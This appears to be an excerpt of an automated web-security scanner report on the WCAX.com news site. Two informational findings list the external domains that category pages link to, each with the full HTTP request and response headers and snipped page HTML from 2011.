<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Local News
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
<link type="text/css" rel="stylesheet" media="all" href="http://content.worldnow.com/global/interface/container-e/core.css?ver=201011111600">
<link type="text/css" rel="stylesheet" media="all" href="http://WCAX.images.worldnow.com/interface/css/container-e.css?ver=2011-03-26%2003%3A55%3A56">
<!--[if lt IE 6]>
...[SNIP]...
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://content.worldnow.com/global/interface/integration/jquery.fancybox-1.3.1.css" media="screen">
<!--MENU INCLUDES-->
<link rel="stylesheet" href="http://content.worldnow.com/global/interface/menu/menu.css?ver=201011111600" type="text/css"><style type="text/css">
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<label for="WNSearchBox-headertop-google_cs">WEB SEARCH BY <img src='http://WCAX.images.worldnow.com/global/images/google/google-logo.gif' alt='Google' class='wnSearchBoxLabelImg-google'></label>
...[SNIP]...
<noscript><iframe id="WNLinksContent391987" name="WNLinksContent391987" class="wnLinksContentIframe" src="http://ftpcontent.worldnow.com/wcax/custom/branding_feature_i.html" width="100%" height="70" scrolling="no" frameborder="0" marginwidth="0" marginheight="0">[Your user agent does not support frames or is currently configured to not display frames. However, you may visit <a href="http://ftpcontent.worldnow.com/wcax/custom/branding_feature_i.html">the related document.</a>
...[SNIP]...
<!--END wnDS70-->
<img id="WNBrandingImage" usemap="#wnBrandingMap" alt="" border="0" onload="if (window.WNElement) WNElement.positionOver('WNDS70', 'WNBrandingImage', { horizontal : 'right', vertical : 'middle' });" src="http://WCAX.images.worldnow.com/images/static/hdr/hdr_branding.jpg"><map name="wnBrandingMap">
...[SNIP]...
<a href="/Global/category.asp?C=18195"><img src="http://WCAX.images.worldnow.com/images/272499_G.gif" width="37" height="29" border="0" alt="Home WCAX.com" title="Home WCAX.com" onsrc="http://WCAX.images.worldnow.com/images/272500_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18197"><img src="http://WCAX.images.worldnow.com/images/272501_G.gif" width="34" height="29" border="0" alt="Local News" title="Local News" onsrc="http://WCAX.images.worldnow.com/images/272502_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18196"><img src="http://WCAX.images.worldnow.com/images/272503_G.gif" width="54" height="29" border="0" alt="Weather" title="Weather" onsrc="http://WCAX.images.worldnow.com/images/272504_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18198"><img src="http://WCAX.images.worldnow.com/images/272505_G.gif" width="43" height="29" border="0" alt="Sports" title="Sports" onsrc="http://WCAX.images.worldnow.com/images/272506_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=408799"><img src="http://WCAX.images.worldnow.com/images/272508_G.gif" width="74" height="29" border="0" alt="WCAX Vermontopia Community Calendar" title="WCAX Vermontopia Community Calendar" onsrc="http://WCAX.images.worldnow.com/images/272509_G.gif"></a>
...[SNIP]...
<a href="javascript:OpenWin('http://www.vermontopia.com||height=768,width=1024,location=yes,resizable=yes,scrollbars=yes,toolbar=yes');"><img src="http://WCAX.images.worldnow.com/images/272510_G.gif" width="82" height="29" border="0" alt="Vermontopia.com" title="Vermontopia.com" onsrc="http://WCAX.images.worldnow.com/images/272511_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=398823"><img src="http://WCAX.images.worldnow.com/images/272512_G.gif" width="74" height="29" border="0" alt="WCAX Promotions" title="WCAX Promotions" onsrc="http://WCAX.images.worldnow.com/images/272513_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=68446"><img src="http://WCAX.images.worldnow.com/images/272514_G.gif" width="54" height="29" border="0" alt="LIFESTYLE" title="LIFESTYLE" onsrc="http://WCAX.images.worldnow.com/images/272516_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18836"><img src="http://WCAX.images.worldnow.com/images/272517_G.gif" width="60" height="29" border="0" alt="Contact Us" title="Contact Us" onsrc="http://WCAX.images.worldnow.com/images/272518_G.gif"></a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://www.worldnow.com/global/interface/jq.js"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/httprequest/httprequest.js"></script>
...[SNIP]...
<a href="/Global/story.asp?S=14408216"><img src="http://WCAX.images.worldnow.com/images/14408216_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14409898"><img src="http://WCAX.images.worldnow.com/images/14409898_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14408340"><img src="http://WCAX.images.worldnow.com/images/14408340_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14412893"><img src="http://WCAX.images.worldnow.com/images/14412893_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14412836"><img src="http://WCAX.images.worldnow.com/images/14412836_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14412419"><img src="http://WCAX.images.worldnow.com/images/14412419_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14413273"><img src="http://WCAX.images.worldnow.com/images/14413273_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14412949"><img src="http://WCAX.images.worldnow.com/images/14412949_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14413603"><img src="http://WCAX.images.worldnow.com/images/14413603_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14413215"><img src="http://WCAX.images.worldnow.com/images/14413215_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14412906"><img src="http://WCAX.images.worldnow.com/images/14412906_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14410562"><img src="http://WCAX.images.worldnow.com/images/14410562_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14408271"><img src="http://WCAX.images.worldnow.com/images/14408271_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14409902"><img src="http://WCAX.images.worldnow.com/images/14409902_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14413381"><img src="http://WCAX.images.worldnow.com/images/14413381_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=13611251"><img src="http://WCAX.images.worldnow.com/images/13611251_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14411911"><img src="http://WCAX.images.worldnow.com/images/14411911_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14411968"><img src="http://WCAX.images.worldnow.com/images/14411968_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14408811"><img src="http://WCAX.images.worldnow.com/images/14408811_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14400516"><img src="http://WCAX.images.worldnow.com/images/14400516_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14410537"><img src="http://WCAX.images.worldnow.com/images/14410537_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14404717"><img src="http://WCAX.images.worldnow.com/images/14404717_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14404311"><img src="http://WCAX.images.worldnow.com/images/14404311_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14403127"><img src="http://WCAX.images.worldnow.com/images/14403127_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14403029"><img src="http://WCAX.images.worldnow.com/images/14403029_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14400642"><img src="http://WCAX.images.worldnow.com/images/14400642_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14406263"><img src="http://WCAX.images.worldnow.com/images/14406263_SS.jpg" alt="" title="" border="0" width="50"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14404540"><img src="http://WCAX.images.worldnow.com/images/14404540_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14406338"><img src="http://WCAX.images.worldnow.com/images/14406338_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14400531"><img src="http://WCAX.images.worldnow.com/images/14400531_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14406368"><img src="http://WCAX.images.worldnow.com/images/14406368_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14406637"><img src="http://WCAX.images.worldnow.com/images/14406637_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14404425"><img src="http://WCAX.images.worldnow.com/images/14404425_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14406704"><img src="http://WCAX.images.worldnow.com/images/14406704_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14403054"><img src="http://WCAX.images.worldnow.com/images/14403054_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14405593"><img src="http://WCAX.images.worldnow.com/images/14405593_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14404916"><img src="http://WCAX.images.worldnow.com/images/14404916_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14405018"><img src="http://WCAX.images.worldnow.com/images/14405018_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14404978"><img src="http://WCAX.images.worldnow.com/images/14404978_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<div class="wnDVUtilityBlock"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<a href="http://www.wcax.com/Global/category.asp?C=18830&nav=menu183_7"><img class="col3_ql_icon" src="http://WCAX.images.worldnow.com/images/272448_G.gif" /></a>
...[SNIP]...
<a href="http://www.wcax.com/Global/category.asp?C=74837&nav=menu183_8"><img class="col3_ql_icon" src="http://WCAX.images.worldnow.com/images/272449_G.gif" /></a>
...[SNIP]...
<a href="http://www.wcax.com/Global/category.asp?C=142185&nav=menu183_9"><img class="col3_ql_icon" src="http://WCAX.images.worldnow.com/images/272447_G.gif" /></a>
...[SNIP]...
<a href="http://www.wcax.com/Global/category.asp?C=157019&nav=menu183_10"><img class="col3_ql_icon" src="http://WCAX.images.worldnow.com/images/272446_G.gif" /></a>
...[SNIP]...
<a href="http://www.wcax.com/global/category.asp?c=13544"><img class="col3_ql_icon" src="http://WCAX.images.worldnow.com/images/272450_G.gif" /></a>
...[SNIP]...
<a href="http://www.wcax.com/global/Story.asp?s=3588651"><img class="col3_ql_icon" src="http://WCAX.images.worldnow.com/images/272351_G.gif" /></a>
...[SNIP]...
<a href="http://www.wcax.com/global/Story.asp?s=11107870"><img class="col3_ql_icon" src="http://WCAX.images.worldnow.com/images/272319_G.gif" /></a>
...[SNIP]...
<div class="col3_ql_right">
                   <a href="http://www.facebook.com/pages/South-Burlington-VT/WCAX-TV/140859045441"><img class="col3_ql_icon" src="http://WCAX.images.worldnow.com/images/272354_G.gif" /></a>
...[SNIP]...
<div class="col3_ql_link_text">
                           <a title="Facebook" style="font:bold 8pt Arial,Verdana,San-serif; color:#666666; line-height:11px;" href="http://www.facebook.com/pages/South-Burlington-VT/WCAX-TV/140859045441">Facebook</a>
...[SNIP]...
<a href="http://www.wcax.com/global/Story.asp?s=10540419"><img class="col3_ql_icon" src="http://WCAX.images.worldnow.com/images/272356_G.gif" /></a>
...[SNIP]...
<a href="http://www.wcax.com/Global/link.asp?L=186750"><img class="col3_ql_icon" src="http://WCAX.images.worldnow.com/images/272355_G.gif" /></a>
...[SNIP]...
<div class="wnDVUtilityBlock"><iframe src="http://www.facebook.com/plugins/likebox.php?id=140859045441&amp;width=292&amp;connections=10&amp;stream=true&amp;header=true&amp;height=587" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:292px; height:587px;" allowTransparency="true"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="WNCopyright"><a href="http://www.worldnow.com" target="_blank"><img src="http://WCAX.images.worldnow.com/images/static/container-e/wn_powerby.gif" alt="Powered by WorldNow" border="0"></a>
...[SNIP]...
<noscript><img src="http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0&amp;WT.sp=WCAX&amp;dcssip=www.wcax.com" name="DCSIMG" width="1" height="1" border="0" alt=""></noscript>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
10.197. http://www.wcax.com/Global/category.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/category.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Global/category.asp?C=68446 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352436393:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS11
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
ntCoent-Length: 68568
Cache-Control: private, max-age=279
Expires: Sat, 09 Apr 2011 12:38:44 GMT
Date: Sat, 09 Apr 2011 12:34:05 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 68568

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Lifestyle
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
<link type="text/css" rel="stylesheet" media="all" href="http://content.worldnow.com/global/interface/container-e/core.css?ver=201011111600">
<link type="text/css" rel="stylesheet" media="all" href="http://WCAX.images.worldnow.com/interface/css/container-e.css?ver=2011-03-26%2003%3A55%3A56">
<!--[if lt IE 6]>
...[SNIP]...
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://content.worldnow.com/global/interface/integration/jquery.fancybox-1.3.1.css" media="screen">
<!--MENU INCLUDES-->
<link rel="stylesheet" href="http://content.worldnow.com/global/interface/menu/menu.css?ver=201011111600" type="text/css"><style type="text/css">
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<label for="WNSearchBox-headertop-google_cs">WEB SEARCH BY <img src='http://WCAX.images.worldnow.com/global/images/google/google-logo.gif' alt='Google' class='wnSearchBoxLabelImg-google'></label>
...[SNIP]...
<div id="WNBranding"><img id="WNBrandingImage" usemap="#wnBrandingMap" alt="" border="0" src="http://WCAX.images.worldnow.com/images/static/hdr/hdr_branding.jpg"><map name="wnBrandingMap">
...[SNIP]...
<a href="/Global/category.asp?C=18195"><img src="http://WCAX.images.worldnow.com/images/272499_G.gif" width="37" height="29" border="0" alt="Home WCAX.com" title="Home WCAX.com" onsrc="http://WCAX.images.worldnow.com/images/272500_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18197"><img src="http://WCAX.images.worldnow.com/images/272501_G.gif" width="34" height="29" border="0" alt="Local News" title="Local News" onsrc="http://WCAX.images.worldnow.com/images/272502_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18196"><img src="http://WCAX.images.worldnow.com/images/272503_G.gif" width="54" height="29" border="0" alt="Weather" title="Weather" onsrc="http://WCAX.images.worldnow.com/images/272504_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18198"><img src="http://WCAX.images.worldnow.com/images/272505_G.gif" width="43" height="29" border="0" alt="Sports" title="Sports" onsrc="http://WCAX.images.worldnow.com/images/272506_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=408799"><img src="http://WCAX.images.worldnow.com/images/272508_G.gif" width="74" height="29" border="0" alt="WCAX Vermontopia Community Calendar" title="WCAX Vermontopia Community Calendar" onsrc="http://WCAX.images.worldnow.com/images/272509_G.gif"></a>
...[SNIP]...
<a href="javascript:OpenWin('http://www.vermontopia.com||height=768,width=1024,location=yes,resizable=yes,scrollbars=yes,toolbar=yes');"><img src="http://WCAX.images.worldnow.com/images/272510_G.gif" width="82" height="29" border="0" alt="Vermontopia.com" title="Vermontopia.com" onsrc="http://WCAX.images.worldnow.com/images/272511_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=398823"><img src="http://WCAX.images.worldnow.com/images/272512_G.gif" width="74" height="29" border="0" alt="WCAX Promotions" title="WCAX Promotions" onsrc="http://WCAX.images.worldnow.com/images/272513_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=68446"><img src="http://WCAX.images.worldnow.com/images/272514_G.gif" width="54" height="29" border="0" alt="LIFESTYLE" title="LIFESTYLE" onsrc="http://WCAX.images.worldnow.com/images/272516_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18836"><img src="http://WCAX.images.worldnow.com/images/272517_G.gif" width="60" height="29" border="0" alt="Contact Us" title="Contact Us" onsrc="http://WCAX.images.worldnow.com/images/272518_G.gif"></a>
...[SNIP]...
<div id="contentTSR-controls">
           <img src="http://ftpcontent.worldnow.com/revenue/tsr/food/food-content_tsr_back.png" border=0 width="22" height="19" rel="b" title="back" alt="back" />
           <img src="http://ftpcontent.worldnow.com/revenue/tsr/food/food-content_tsr_pause.png" border=0 width="22" height="19" rel="ps" title="play/pause" alt="play/pause" />
           <img src="http://ftpcontent.worldnow.com/revenue/tsr/food/food-content_tsr_forward.png" border=0 width="22" height="19" rel="f" title="forward" alt="forward" />
       </div>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ftpcontent.worldnow.com/revenue/js/ellipses-function.js"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/httprequest/httprequest.js"></script>
...[SNIP]...
<a href="/Global/category.asp?C=36210"><img src="http://images.worldnow.com/Revenue/images/36210_CS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/category.asp?C=37891"><img src="http://images.worldnow.com/Revenue/images/37891_CS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/category.asp?C=38921"><img src="http://images.worldnow.com/Cmedia/images/38921_CS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/category.asp?C=120651"><img src="http://images.worldnow.com/Revenue/images/120651_CS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/category.asp?C=120652"><img src="http://images.worldnow.com/Revenue/images/120652_CS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/category.asp?C=39546"><img src="http://images.worldnow.com/Revenue/images/39546_CS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/category.asp?C=23748"><img src="http://images.worldnow.com/Revenue/images/23748_CS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/category.asp?C=29878"><img src="http://images.worldnow.com/Revenue/images/29878_CS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/category.asp?C=58532"><img src="http://images.worldnow.com/Revenue/images/58532_CS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/category.asp?C=41934"><img src="http://images.worldnow.com/Revenue/images/41934_CS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/category.asp?C=73801"><img src="http://images.worldnow.com/Revenue/images/73801_CS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/category.asp?C=92036"><img src="http://images.worldnow.com/Revenue/images/92036_CS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/category.asp?C=120657"><img src="http://images.worldnow.com/Revenue/images/120657_CS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<div id="financialcontentModule">
<script
src="http://studio-5.financialcontent.com/worldnow?Module=snapshot&OutputMode=JS"></script>
...[SNIP]...
<div id="WNCopyright"><a href="http://www.worldnow.com" target="_blank"><img src="http://WCAX.images.worldnow.com/images/static/container-e/wn_powerby.gif" alt="Powered by WorldNow" border="0"></a>
...[SNIP]...
<noscript><img src="http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0&amp;WT.sp=WCAX&amp;dcssip=www.wcax.com" name="DCSIMG" width="1" height="1" border="0" alt=""></noscript>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
10.198. http://www.wcax.com/Global/category.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/category.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Global/category.asp?C=18963 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352460288:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS53
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
ntCoent-Length: 60928
Cache-Control: private, max-age=299
Expires: Sat, 09 Apr 2011 12:40:22 GMT
Date: Sat, 09 Apr 2011 12:35:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 60928

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>WCAX News
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
